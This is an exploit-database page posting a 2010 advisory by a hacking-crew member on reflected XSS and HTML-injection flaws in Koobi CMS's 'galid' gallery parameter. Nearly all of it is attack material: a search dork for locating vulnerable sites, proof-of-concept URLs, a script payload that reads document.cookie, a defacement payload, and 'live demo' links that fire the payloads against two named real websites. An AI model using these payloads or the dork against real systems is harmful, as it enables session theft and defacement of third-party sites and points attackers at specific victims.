[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Koobi CMS (galid) Multiple XSS Vulnerabilities

Author
**RoAd_KiLlEr**
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13309
Category
web applications
Date add
12-07-2010
Platform
php
==============================================
Koobi CMS (galid) Multiple XSS Vulnerabilities
==============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                ###########################################           1
0               I'm **RoAd_KiLlEr**  member from Inj3ct0r Team         1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title              Koobi CMS (galid) Multiple XSS Vulnerabilities
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://inj3ct0r.com
[~] Vendor: http://www.dream4.de
[~] Version:4.3.0 & 4.2.5 & 4.2.4 Maybe Higher Versions are affected too
[~] Price : 89,00Ђ
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Description:Koobi:CMS ist ein komfortables und leistungsf?higes Content-Management-System (CMS) fÑŒr Privatpersonen, Vereine, kleine und mittelst?ndische Unternehmen, die einen professionellen Internetauftritt realisieren m?chten.
==========================================


[+] Dork: allinurl: "index.php?p=gallerypic img_id" 

==========================================


[ I ].  XSS Vulnerability
=+=+=+=+=+=+=+=+=+

[P0C]:  http://127.0.0.1/path/index.php?p=gallerypic&img_id=[Valid ID]&galid= [XSS] 


[XSS]: "><script>alert(document.cookie)</script>


[D3m0]:  http://127.0.0.1/path/index.php?p=gallerypic&img_id=[Valid ID]&galid="><script>alert(document.cookie)</script>


[L!v3 D3m0]: http://punsouvenir.com/index.php?p=gallerypic&img_id=2755&galid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


[ II ].  HTML-Injection Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+


[P0C]:  http://127.0.0.1/path/index.php?p=gallerypic&img_id=[Valid ID]&galid=[HTML-Injection]


[HTML-Injection]: ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>


[L!v3 D3m0]: http://www.bmw-freunde-rhein-main.de/index.php?area=1&p=gallery&action=showimages&galid=%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont%20color=Red%20size=16%3EXSS%20by%20**RoAd_KiLlEr**%3C/font%3E%3C/h1%3E%3Cmarquee%3E




===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | All  Inj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================



#  0day.today [2024-12-24]  #